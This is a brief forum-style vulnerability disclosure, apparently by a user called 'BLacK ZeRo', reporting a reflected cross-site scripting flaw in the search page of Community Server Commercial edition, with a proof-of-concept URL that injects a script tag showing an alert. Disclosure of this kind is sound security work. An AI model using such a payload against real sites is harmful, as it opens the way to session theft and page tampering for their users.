hey guys .. check out this new xss i just found ;P

Vulnerable : communityserver Commercial edition
web : http://communityserver.org/

XSS :

http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealer
t(%27bl4ck%27)%3c%2fscript%3e&o=Relevance

Discovered By BLacK ZeRo
bL4ck (at) bsdmail (dot) org [email concealed]

Best regards ,,

[ reply ]